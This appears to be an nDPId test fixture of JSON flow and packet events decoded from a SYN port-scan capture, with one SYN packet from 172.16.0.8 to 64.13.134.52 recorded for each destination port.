+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsnmIAADoGcBCsEAAIQA2GNIzSAlHdUoMYAAAAAGACDAAqPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAs8qkAAC8GJsmsEAAIQA2GNIzSF3LdUoMYAAAAAGACEAARHQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0kAACYGYymsEAAIQA2GNIzSBR7dUoMYAAAAAGACDAAncQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsRIMAACsG2O+sEAAIQA2GNIzSH0jdUoMYAAAAAGACEAAJRwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2UAACwGmQ2sEAAIQA2GNIzSBFrdUoMYAAAAAGACBAAwNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsvfoAADoGUHisEAAIQA2GNIzTBC3dU4MZAAAAAGACDAAoXwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVvEAADUGvIGsEAAIQA2GNIzTDx3dU4MZAAAAAGACCAAhbwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsc5UAACcGrd2sEAAIQA2GNIzTF3ndU4MZAAAAAGACEAAREwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGAAACYGlhKsEAAIQA2GNIzTEJLdU4MZAAAAAGACDAAb+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAs2QcAAC8GQGusEAAIQA2GNIzTDSrdU4MZAAAAAGACEAAbYgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAspzIAACYGe0CsEAAIQA2GNIzTH0HdU4MZAAAAAGACDAANSwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwYAADgGuWysEAAIQA2GNIzTwAHdU4MZAAAAAGACBAB0igAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsctcAACcGrpusEAAIQA2GNIzTAtLdU4MZAAAAAGACEAAlugAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyx4AACUGWFSsEAAIQA2GNIzTAgHdU4MZAAAAAGACCAAuiwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsagcAADMGq2usEAAIQA2GNIzTS1PdU4MZAAAAAGACEADdOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsEW4AAC0GCgWsEAAIQA2GNIzTBGbdU4MZAAAAAGACCAAsJgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAscDEAADoGnkGsEAAIQA2GNIzTI\/fdU4MZAAAAAGACDAAIlQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsJJwAADMG8NasEAAIQA2GNIzT4uDdU4MZAAAAAGACEABFqwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1sAACUG7BesEAAIQA2GNIzTF0ndU4MZAAAAAGACCAAZQwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsFcMAACoGCLCsEAAIQA2GNIzT3aHdU4MZAAAAAGACDABO6gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAshNgAAC4GlZqsEAAIQA2GNIzTGabdU4MZAAAAAGACDAAS5gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTIcAADAGy+usEAAIQA2GNIzTBDXdU4MZAAAAAGACBAAwVwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsBBMAADAGFGCsEAAIQA2GNIzTgATdU4MZAAAAAGACBAC0hwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDhkAACkGEVqsEAAIQA2GNIzTBB\/dU4MZAAAAAGACCAAsbQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 